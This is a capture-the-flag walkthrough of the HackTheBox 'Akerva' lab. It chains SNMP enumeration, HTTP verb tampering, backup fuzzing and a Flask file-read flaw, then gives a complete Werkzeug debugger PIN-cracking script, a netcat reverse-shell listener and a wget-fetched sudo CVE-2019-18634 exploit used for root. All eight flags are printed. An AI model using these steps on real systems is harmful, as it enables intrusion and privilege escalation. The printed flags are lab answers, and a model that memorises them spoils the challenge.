AKERVA HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 22:34 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating NSE at 22:34
Completed NSE at 22:34, 0.00s elapsed
Initiating Ping Scan at 22:34
Scanning 10.13.37.11 [4 ports]
Completed Ping Scan at 22:34, 0.43s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:34
Scanning akerva.htb (10.13.37.11) [1000 ports]
Discovered open port 22/tcp on 10.13.37.11
Discovered open port 80/tcp on 10.13.37.11
Discovered open port 5000/tcp on 10.13.37.11
Completed SYN Stealth Scan at 22:34, 5.96s elapsed (1000 total ports)
Initiating Service scan at 22:34
Scanning 3 services on akerva.htb (10.13.37.11)
Completed Service scan at 22:34, 25.70s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against akerva.htb (10.13.37.11)
Retrying OS detection (try #2) against akerva.htb (10.13.37.11)
Initiating Traceroute at 22:34
Completed Traceroute at 22:34, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:34
Completed Parallel DNS resolution of 2 hosts. at 22:34, 0.19s elapsed
NSE: Script scanning 10.13.37.11.
Initiating NSE at 22:34
Completed NSE at 22:35, 11.72s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 1.69s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for akerva.htb (10.13.37.11)
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
|   256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
|_  256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.13.37.11/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
5000/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-auth: 
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_  Basic realm=Authentication Required
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Android 4.2.2 (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 36.817 days (since Fri Jun 19 02:58:34 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   299.62 ms 10.13.14.1
2   299.73 ms akerva.htb (10.13.37.11)

NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds
           Raw packets sent: 1240 (57.962KB) | Rcvd: 1062 (45.946KB)

PORT 80

SOURCE – CODE

Here we go with our 1st flag:

AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}

Now we will be searching for UDP PORT 161

Here to enumerate into SNMP service we are going to use this command

snmp-check 10.13.37.11 -c public -v 2c

Here we will save output in a file as we will be getting large number of data

OUTPUT:

<----->


  1233                  runnable              cron                  /usr/sbin/CRON        -f                  
  1234                  runnable              cron                  /usr/sbin/CRON        -f                  
  1235                  runnable              sh                    /bin/sh               -c /opt/check_backup.sh
  1236                  runnable              sh                    /bin/sh               -c /opt/check_devSite.sh
  1237                  runnable              check_backup.sh       /bin/bash             /opt/check_backup.sh
  1238                  runnable              check_devSite.s       /bin/bash             /opt/check_devSite.sh
  1241                  runnable              backup_every_17       /bin/bash             /var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
  1242                  runnable              space_dev.py          /usr/bin/python       /var/www/html/dev/space_dev.py
  1247                  runnable              python                /usr/bin/python       /var/www/html/dev/space_dev.py

<----->

Here we go with our 2nd flag

AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}

Here we will see that we have something backup which we need to get but the thing is how as other files we will be trying to access will be denied. So here we will be sending the request through BURP.

Rather then Requesting for GET we will be going through POST

Here we go with the result and 3rd Flag

AKERVA{IKNoW###VeRbTamper!nG_==}

And the code looks like this which we got from POST request

#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#

SAVE_DIR=/var/www/html/backups

while true
do
	ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
	echo "Erasing old backups..."
	rm -rf $SAVE_DIR/*

	echo "Backuping..."
	zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*

	echo "Done..."
	sleep 1020
done

What this code actually mean is that we got akerva.htb it will save backup in backups directory with the name as :

backup_[year mon date hour minute second]

Here we will be just using curl command to go through akerva.htb and we will be using flag –head cuz we need time when we curl as our machine time differs from its time. The output looks like this

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #curl http://akerva.htb --head
HTTP/1.1 301 Moved Permanently
Date: Sat, 25 Jul 2020 18:00:23 GMT
Server: Apache/2.4.29 (Ubuntu)
X-Pingback: http://10.13.37.11/xmlrpc.php
X-Redirect-By: WordPress
Location: http://10.13.37.11/
Content-Type: text/html; charset=UTF-8

So here we will be creating name for our backup file which we will be downloading afterwards

25 Jul 2020 18:00:23 >> backup_2020072518XXXX

Here I have used XXXX because we need to know minutes and seconds so to do that we will use 4 digit number wordlist to fuzz further time

COMMAND TO DO THAT:

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #wfuzz -u http://akerva.htb/backups/backup_2020072518FUZZ.zip -w 4digit.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://akerva.htb/backups/backup_2020072518FUZZ.zip
Total requests: 10000

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                
===================================================================

000001630:   200        82522    810989   20937179    "1629"                                                                                                 
                        L         W       Ch                                                                                                                 
000008014:   404        9 L      31 W     272 Ch      "8013"                      

So here we will be just downloading the backup zip

wget http://akerva.htb/backup/backup20200725181629.zip

ENUMERATING VAR FOLDER

Here we have var folder which we will be enumerating from where we will get that script which we got from SNMP

┌─[root@liquid]─[~/Desktop/HTB/akervaC/var/www/html/dev]
└──╼ #cat space_dev.py 
#!/usr/bin/python

from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
auth = HTTPBasicAuth()

users = {
        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
        }

@auth.verify_password
def verify_password(username, password):
    if username in users:
        return check_password_hash(users.get(username), password)
    return False

@app.route('/')
@auth.login_required
def hello_world():
    return 'Hello, World!'

# TODO
@app.route('/download')
@auth.login_required
def download():
    return downloaded_file

@app.route("/file")
@auth.login_required
def file():
	filename = request.args.get('filename')
	try:
		with open(filename, 'r') as f:
			return f.read()
	except:
		return 'error'

if __name__ == '__main__':
    print(app)
    print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
    app.run(host='0.0.0.0', port='5000', debug = True)

Here we go with our 4rth flag

AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}

Now if we see in the script we are give that we have username anhd password is hash sop lets try this flag as pass and aas as username on port 5000 where we were asked for user and pass

Here we see our text hello world

So we have seen in script that we have file directory where filename is taking value which looks like LFI

Lets try to get flag from aas folder and his ssh keys

Here we got our 5th flag

AKERVA{IKNOW#LFi_@_}

But we donot have have id_rsa key So we have got nothing as much.

After fuzzing we have console directory which is asking for pin

So we need pin If we check its home page name as

Werkzeug Debugger after google you will have exploit for this

https://www.daehee.com/werkzeug-console-pin-exploit/

So here we have script which needs Mac Address and Machine-id

which we can get through LFI which we got earlier

Here we will just use python to convert that mac address

>>> print(0x5056b96d18)
345052376344

Whole code looks like this

import hashlib
from itertools import chain
probably_public_bits = [
        'aas',# username
        'flask.app',# modname
        'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
        '345052376344', # str(uuid.getnode()),  /sys/class/net/ens33/address
        '258f132cd7e647caaf5510e3aca997c1' # get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
        if not bit:
                continue
        if isinstance(bit, str):
                bit = bit.encode('utf-8')
        h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
        for group_size in 5, 4, 3:
                if len(num) % group_size == 0:
                        rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                                                  for x in range(0, len(num), group_size))
                        break
        else:
                rv = num

print(rv)

We will be executing this code and we will get our pin

which we will use get something like this

Here in source code we came to know that we can execute python code so lets just execute python reverse shell

Here we will get our shell

┌─[root@liquid]─[~/Desktop/HTB/akervaC]
└──╼ #rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.14.10] from (UNKNOWN) [10.13.37.11] 57478
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(aas) gid=1000(aas) groups=1000(aas),24(cdrom),30(dip),46(plugdev)
$ python -c 'import pty;pty.spawn("/bin/bash")'
aas@Leakage:~$ ls
ls
flag.txt

Here you will have hiddenflag in the same directory

aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}

Here we go with our 6th flag

AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}

After searching and enumerating we will get nothing So we go version of sudo as when we su we get some text lets check that

aas@Leakage:/opt$ sudo --version
sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

So if you google we will find exploit for this .

https://github.com/saleemrashid/sudo-cve-2019-18634/

Here we will just clone this repo and compile it in our machine then do the following

aas@Leakage:/tmp$ wget http://10.13.14.10/exploit
wget http://10.13.14.10/exploit
--2020-07-25 16:40:37--  http://10.13.14.10/exploit
Connecting to 10.13.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17480 (17K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  17.07K  26.8KB/s    in 0.6s    

2020-07-25 16:40:39 (26.8 KB/s) - ‘exploit’ saved [17480/17480]

aas@Leakage:/tmp$ ls
ls
exploit
systemd-private-d387e08ebced48278578cfff30488f9b-apache2.service-FUVgpA
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-resolved.service-7xDcps
systemd-private-d387e08ebced48278578cfff30488f9b-systemd-timesyncd.service-p8EwEw
vmware-root_625-4021587817
aas@Leakage:/tmp$ chmod +x exploit
chmod +x exploit
aas@Leakage:/tmp$ ./exploit
./exploit
[sudo] password for aas: 
There's a lot of it about, you know.
# id
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(aas)
# cd /root
ls
cd /root
# ls
flag.txt  secured_note.md
# cat flag.txt
cat flag.txt
AKERVA{IkNow_Sud0_sUckS!}

Here we go with our 7th flag

AKERVA{IkNow_Sud0_sUckS!}

Here we have some text in secrets file So lets just copy and decode it base64. after which we will use ouyr python tool hash identifier which will give you that it is VIGENER.

So here we will be using decode.fr to get this done but if we go directly we will get random letters so here we will be going to check for letters used in this string

GOAHGHEEGSAEEHACEGULREPEEECEOKMKERFSESFRLKERUKTSVPMSSNHSKRFFAGIAPVETCNMDLVFHDAOGFLAFGSKEULMVOOWWCAHCRFVVNVHVCMSYELSPMIHHMODAUKHE

Here we will see that we have some alphabets which are not used here

b,j,q,x,c

Here we string we need

Set of alphabets we need

string which will be present in flag is AKERVA

So with all this here we go

Here we go with our 8th flag

AKERVA{IKNOOOWVIGEEENERRRE}

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

2 thoughts on “AKERVA HACKTHEBOX WRITEUP

Add yours

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: